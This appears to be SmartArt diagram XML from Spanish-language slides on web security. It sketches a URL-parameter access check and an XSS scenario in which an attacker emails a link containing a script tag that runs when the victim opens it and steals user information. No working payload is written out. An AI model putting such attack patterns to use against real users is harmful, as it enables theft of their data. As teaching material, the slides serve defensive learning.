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0EFB1-4FF3-4028-A9C8-F562217BBD7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1674641-2EA6-44C7-AEC2-DA0DEC13C7CA}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-MX" sz="1800" dirty="0" smtClean="0"/>
            <a:t>http://www.ejemplo.com/privado.php?usuario=jorge</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64C8D276-CEEA-4A18-86FE-79149DEB063C}" type="parTrans" cxnId="{BB61F595-FF84-4F4C-97D6-0D4CACB24E02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}" type="sibTrans" cxnId="{BB61F595-FF84-4F4C-97D6-0D4CACB24E02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A17FB7B-497A-4727-9BCD-F204AB3FB1B9}">
      <dgm:prSet phldrT="[Texto]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-MX" sz="1800" dirty="0" smtClean="0"/>
            <a:t>http://www.ejemplo.com/privado.php?usuario=luis</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-MX" sz="600" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB0804A9-E5A7-4D65-B891-7F42946F27DA}" type="parTrans" cxnId="{78972FFF-80CD-411F-9780-10E6EA040033}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}" type="sibTrans" cxnId="{78972FFF-80CD-411F-9780-10E6EA040033}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{300186FF-7E17-490E-906A-BB8A090DF20A}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Verificar si tiene acceso</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE0A4889-96BC-4BB4-BAA0-2C4782254ED6}" type="parTrans" cxnId="{703D5E28-D3A8-44FD-98BF-DD93AB7397E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EC3BC8C-CAA3-4550-9677-774653951569}" type="sibTrans" cxnId="{703D5E28-D3A8-44FD-98BF-DD93AB7397E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" type="pres">
      <dgm:prSet presAssocID="{0020EFB1-4FF3-4028-A9C8-F562217BBD7E}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B511EC03-67B0-4665-9F3F-6934A1F5A9EC}" type="pres">
      <dgm:prSet presAssocID="{C1674641-2EA6-44C7-AEC2-DA0DEC13C7C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C8107A-3FA3-4540-B15A-68DB3C2F5446}" type="pres">
      <dgm:prSet presAssocID="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D26A7B89-EF2B-4437-92AB-27D4BCCA7CFA}" type="pres">
      <dgm:prSet presAssocID="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{302D1419-5332-4947-9EF4-7012ACEEF774}" type="pres">
      <dgm:prSet presAssocID="{8A17FB7B-497A-4727-9BCD-F204AB3FB1B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DF7525D-5BB0-4812-9876-9C78AFE21F99}" type="pres">
      <dgm:prSet presAssocID="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1AA06127-54B6-4434-BEC7-FC5AECA6011E}" type="pres">
      <dgm:prSet presAssocID="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{094E209A-8048-482A-B31F-65CC80F574E3}" type="pres">
      <dgm:prSet presAssocID="{300186FF-7E17-490E-906A-BB8A090DF20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03D5E28-D3A8-44FD-98BF-DD93AB7397E3}" srcId="{0020EFB1-4FF3-4028-A9C8-F562217BBD7E}" destId="{300186FF-7E17-490E-906A-BB8A090DF20A}" srcOrd="2" destOrd="0" parTransId="{BE0A4889-96BC-4BB4-BAA0-2C4782254ED6}" sibTransId="{5EC3BC8C-CAA3-4550-9677-774653951569}"/>
    <dgm:cxn modelId="{AD939361-5A98-4818-951D-3584FE92E800}" type="presOf" srcId="{C1674641-2EA6-44C7-AEC2-DA0DEC13C7CA}" destId="{B511EC03-67B0-4665-9F3F-6934A1F5A9EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{070EAC74-2EDD-49CF-9D13-075DCFC43AF6}" type="presOf" srcId="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}" destId="{1AA06127-54B6-4434-BEC7-FC5AECA6011E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3ED88646-6EBC-4CAE-9178-DDCBB1B53A4B}" type="presOf" srcId="{300186FF-7E17-490E-906A-BB8A090DF20A}" destId="{094E209A-8048-482A-B31F-65CC80F574E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{ED22FAFE-FB0E-4FFD-B2DC-5937C9A5F98E}" type="presOf" srcId="{8A17FB7B-497A-4727-9BCD-F204AB3FB1B9}" destId="{302D1419-5332-4947-9EF4-7012ACEEF774}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5963667C-53D4-4BB0-AD5B-D0789FE151A9}" type="presOf" srcId="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}" destId="{9DF7525D-5BB0-4812-9876-9C78AFE21F99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7EF31BC3-D9D3-4D3B-B531-96EDBAA80955}" type="presOf" srcId="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}" destId="{46C8107A-3FA3-4540-B15A-68DB3C2F5446}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{BB61F595-FF84-4F4C-97D6-0D4CACB24E02}" srcId="{0020EFB1-4FF3-4028-A9C8-F562217BBD7E}" destId="{C1674641-2EA6-44C7-AEC2-DA0DEC13C7CA}" srcOrd="0" destOrd="0" parTransId="{64C8D276-CEEA-4A18-86FE-79149DEB063C}" sibTransId="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}"/>
    <dgm:cxn modelId="{78972FFF-80CD-411F-9780-10E6EA040033}" srcId="{0020EFB1-4FF3-4028-A9C8-F562217BBD7E}" destId="{8A17FB7B-497A-4727-9BCD-F204AB3FB1B9}" srcOrd="1" destOrd="0" parTransId="{BB0804A9-E5A7-4D65-B891-7F42946F27DA}" sibTransId="{F1D3B2DD-8D56-46FB-BD36-2F77B18A5D40}"/>
    <dgm:cxn modelId="{0F5CEDAE-BD27-49EA-91CE-F6A016AB7D3C}" type="presOf" srcId="{31D5E615-3791-47DD-8DFB-997B7A42C0AB}" destId="{D26A7B89-EF2B-4437-92AB-27D4BCCA7CFA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{806BAE2A-4743-4D07-A212-F37B6EB0A633}" type="presOf" srcId="{0020EFB1-4FF3-4028-A9C8-F562217BBD7E}" destId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A6CD0187-6F5A-4481-847A-0CA4AFE06D69}" type="presParOf" srcId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" destId="{B511EC03-67B0-4665-9F3F-6934A1F5A9EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D80CCF54-29D1-4D86-A0D8-BDE450B4F7B9}" type="presParOf" srcId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" destId="{46C8107A-3FA3-4540-B15A-68DB3C2F5446}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{700D079D-8ED4-4B6A-9CAD-60AFC8B00DAD}" type="presParOf" srcId="{46C8107A-3FA3-4540-B15A-68DB3C2F5446}" destId="{D26A7B89-EF2B-4437-92AB-27D4BCCA7CFA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D9F83B60-34DE-442D-8074-04A65E00BAD7}" type="presParOf" srcId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" destId="{302D1419-5332-4947-9EF4-7012ACEEF774}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{C42368BE-5AA5-497B-B22D-D64E1D5C5876}" type="presParOf" srcId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" destId="{9DF7525D-5BB0-4812-9876-9C78AFE21F99}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1663B9DA-2AEC-4DDA-9846-21989C41A141}" type="presParOf" srcId="{9DF7525D-5BB0-4812-9876-9C78AFE21F99}" destId="{1AA06127-54B6-4434-BEC7-FC5AECA6011E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{BA7D5E59-EA19-4F64-92CB-51586685B579}" type="presParOf" srcId="{EB819483-489B-440E-B01D-8C07FFE07CEE}" destId="{094E209A-8048-482A-B31F-65CC80F574E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CDEFEC-EC19-4EC4-8C45-B2662AC8062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496A4E5-C4E5-4A83-A332-FDAD6AB02A45}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>atacante</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDA6A2F7-6517-49F9-BFC1-FDB534774E06}" type="parTrans" cxnId="{580EA674-46B9-495C-BDFB-D6204D191EC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}" type="sibTrans" cxnId="{580EA674-46B9-495C-BDFB-D6204D191EC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9393A9EB-26A1-4622-9603-7FE2DD5D9B5E}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
            <a:t>Envia</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t> mail con un link con etiqueta &lt;script&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B28BC193-DE1C-4E51-A12B-A06C18AE0F6C}" type="parTrans" cxnId="{6FAB646C-9BAD-41DB-A8DF-434219A19814}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F6A8EB1-70D9-4218-A7A5-8E6B89B1146C}" type="sibTrans" cxnId="{6FAB646C-9BAD-41DB-A8DF-434219A19814}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>victima</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D90F54EA-1088-40A0-806E-FB53B441BD63}" type="parTrans" cxnId="{0299C5A9-D328-4371-BEA7-D6841F993C3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}" type="sibTrans" cxnId="{0299C5A9-D328-4371-BEA7-D6841F993C3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BED511E1-31A4-48E9-9233-02EFF8BACFF9}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Abre el link y el script se ejecuta</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17B22049-D297-472C-92FA-8F361189E3DC}" type="parTrans" cxnId="{2DBC8392-0FB0-4A7D-AFC7-3749949DD433}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B95D9460-E259-4A3C-AADA-1593C29E40E3}" type="sibTrans" cxnId="{2DBC8392-0FB0-4A7D-AFC7-3749949DD433}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>resultado</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90153F6B-735A-4648-BC51-1EF95477CEFE}" type="parTrans" cxnId="{8456C619-66AA-454C-BF35-E9F14C85A53B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A89397D5-07A7-4BCE-ADC3-9EDC563350E3}" type="sibTrans" cxnId="{8456C619-66AA-454C-BF35-E9F14C85A53B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AF2363F-7EE0-4F22-A283-81BB7C75EBAD}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>Robo de información del usuario</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86FC3D5F-0C8B-4771-95F5-0F717918EF7A}" type="parTrans" cxnId="{8CDF66DD-3D05-45CD-B25C-0A95752AC22A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB506232-BA2D-443E-BCC3-5B2496E6F734}" type="sibTrans" cxnId="{8CDF66DD-3D05-45CD-B25C-0A95752AC22A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D843460B-D78D-4856-8698-28CD2BA90342}">
      <dgm:prSet phldrT="[Texto]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            <a:t>incrustada </a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{373BE8D6-A2BC-4337-B876-F03C2FB4FAFD}" type="parTrans" cxnId="{0DB08EB5-AD68-4468-A1F0-EF56DD41C3F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAD06E41-0AB4-4FA7-BEB6-E354503793D2}" type="sibTrans" cxnId="{0DB08EB5-AD68-4468-A1F0-EF56DD41C3F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" type="pres">
      <dgm:prSet presAssocID="{DCCDEFEC-EC19-4EC4-8C45-B2662AC8062A}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D493D82B-1D1B-4B1C-AA54-3EFFA0B1DA05}" type="pres">
      <dgm:prSet presAssocID="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C6AE562-6BB3-43C3-AB30-5CEF1CDE856F}" type="pres">
      <dgm:prSet presAssocID="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45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F5D8DF4-53A9-40D4-AD99-810CF75C7D90}" type="pres">
      <dgm:prSet presAssocID="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" presName="parSh" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16551DD0-CFFA-4535-A6EE-368CA9455203}" type="pres">
      <dgm:prSet presAssocID="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45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F789F79-7B05-44FA-9640-E4604D893283}" type="pres">
      <dgm:prSet presAssocID="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FDFC249-40F5-4DA1-8F1D-E9AADEE40268}" type="pres">
      <dgm:prSet presAssocID="{A3863E85-5EAD-44C2-B368-D9CDEC5A07B7}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F533BBC-D97A-44F3-93F8-4BFA9D4B5147}" type="pres">
      <dgm:prSet presAssocID="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4AABA46-065E-43BF-BA3D-AA6D4E371E15}" type="pres">
      <dgm:prSet presAssocID="{307B8FBA-B657-41D5-A3F1-FCB7083A23B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81D153-CE8A-4DB2-AB8E-43C48D0C4E33}" type="pres">
      <dgm:prSet presAssocID="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" presName="parSh" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BABCD728-5E7E-459E-BE08-DE5FDA4D18A6}" type="pres">
      <dgm:prSet presAssocID="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" presName="desTx" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13EFB59-5236-4A81-8EF4-F20AD73512FB}" type="pres">
      <dgm:prSet presAssocID="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A91CBAA5-C0C0-49E2-99B0-3F0DC12310DA}" type="pres">
      <dgm:prSet presAssocID="{32D08A8E-13DC-4FE5-A335-5ABCEC454908}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{667812FA-8316-412A-846B-32EA212CE049}" type="pres">
      <dgm:prSet presAssocID="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC85646A-0962-4B0E-932B-E5F121DB3D19}" type="pres">
      <dgm:prSet presAssocID="{A2905CB8-9EE5-426E-9066-26B11EEFA15A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83D1A49-9795-43B0-97AA-FCAC4D5F3172}" type="pres">
      <dgm:prSet presAssocID="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" presName="parSh" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A36BF611-F42D-499C-8A8D-29AF9E6AE570}" type="pres">
      <dgm:prSet presAssocID="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" presName="desTx" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E8CBAA60-54B9-4EF6-8EB0-0D9659A1E1C4}" type="presOf" srcId="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" destId="{7781D153-CE8A-4DB2-AB8E-43C48D0C4E33}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{8CDF66DD-3D05-45CD-B25C-0A95752AC22A}" srcId="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" destId="{0AF2363F-7EE0-4F22-A283-81BB7C75EBAD}" srcOrd="0" destOrd="0" parTransId="{86FC3D5F-0C8B-4771-95F5-0F717918EF7A}" sibTransId="{EB506232-BA2D-443E-BCC3-5B2496E6F734}"/>
    <dgm:cxn modelId="{6FAB646C-9BAD-41DB-A8DF-434219A19814}" srcId="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" destId="{9393A9EB-26A1-4622-9603-7FE2DD5D9B5E}" srcOrd="0" destOrd="0" parTransId="{B28BC193-DE1C-4E51-A12B-A06C18AE0F6C}" sibTransId="{0F6A8EB1-70D9-4218-A7A5-8E6B89B1146C}"/>
    <dgm:cxn modelId="{6308A874-A9A8-4E15-971E-0636E9B339F4}" type="presOf" srcId="{A2905CB8-9EE5-426E-9066-26B11EEFA15A}" destId="{FC85646A-0962-4B0E-932B-E5F121DB3D19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{E558322A-B947-440C-8CDD-7BBB132C7C45}" type="presOf" srcId="{9393A9EB-26A1-4622-9603-7FE2DD5D9B5E}" destId="{16551DD0-CFFA-4535-A6EE-368CA9455203}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{5A59383F-F50C-4804-9806-035CA9AD6AC0}" type="presOf" srcId="{8496A4E5-C4E5-4A83-A332-FDAD6AB02A45}" destId="{9F5D8DF4-53A9-40D4-AD99-810CF75C7D90}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{2DBC8392-0FB0-4A7D-AFC7-3749949DD433}" srcId="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" destId="{BED511E1-31A4-48E9-9233-02EFF8BACFF9}" srcOrd="0" destOrd="0" parTransId="{17B22049-D297-472C-92FA-8F361189E3DC}" sibTransId="{B95D9460-E259-4A3C-AADA-1593C29E40E3}"/>
    <dgm:cxn modelId="{2EFBC01B-266D-4678-9709-7B96466E3596}" type="presOf" srcId="{307B8FBA-B657-41D5-A3F1-FCB7083A23B2}" destId="{A4AABA46-065E-43BF-BA3D-AA6D4E371E15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
    <dgm:cxn modelId="{3E81F390-33BD-4B68-95B9-248C8655FD15}" type="presOf" srcId="{DCCDEFEC-EC19-4EC4-8C45-B2662AC8062A}" destId="{FED258E7-C1F3-4B19-A9EA-ACBDAE8051A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process3"/>
